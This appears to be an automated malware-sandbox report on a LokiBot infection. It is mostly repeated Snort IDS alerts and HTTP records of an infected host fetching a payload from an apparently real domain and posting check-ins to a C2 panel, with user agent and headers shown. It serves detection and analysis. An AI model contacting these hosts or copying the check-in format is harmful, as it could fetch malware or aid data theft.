        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49938 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49938 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49938 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49939 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49939 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49939 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49939 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49940 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49940 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49940 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49940 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49941 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49941 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49941 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49941 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49942 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49942 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49942 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49942 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49943 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49943 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49943 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49943 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49944 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49944 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49944 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49944 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49948 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49948 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49948 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49948 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49949 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49949 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49949 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49949 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49950 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49950 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49950 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49950 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49951 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49951 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49951 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49951 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49952 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49952 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49952 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49952 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49953 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49953 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49953 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49953 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49954 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49954 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49954 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49954 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49955 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49955 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49955 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49955 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49956 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49956 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49956 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49956 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49957 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49957 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49957 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49957 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49958 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49958 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49958 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49958 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49959 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49959 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49959 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49959 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49960 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49960 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49960 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49960 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49961 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49961 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49961 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49961 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49962 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49962 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49962 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49962 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49964 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49964 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49964 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49964 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49965 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49965 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49965 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49965 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49966 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49966 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49966 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49966 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49967 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49967 -> 176.223.209.128:80
        C2 URLs / IPs found in malware configurationShow sources
        Source: Malware configuration extractorURLs: https://fabricraft.co.za/Farmant_hhVNwJna195.bin
        Source: Joe Sandbox ViewASN Name: ROHOSTWAY-ASRO ROHOSTWAY-ASRO
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: Joe Sandbox ViewIP Address: 176.223.209.128 176.223.209.128
        Source: global trafficHTTP traffic detected: GET /Farmant_hhVNwJna195.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: fabricraft.co.zaCache-Control: no-cache
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 178Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 3206Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
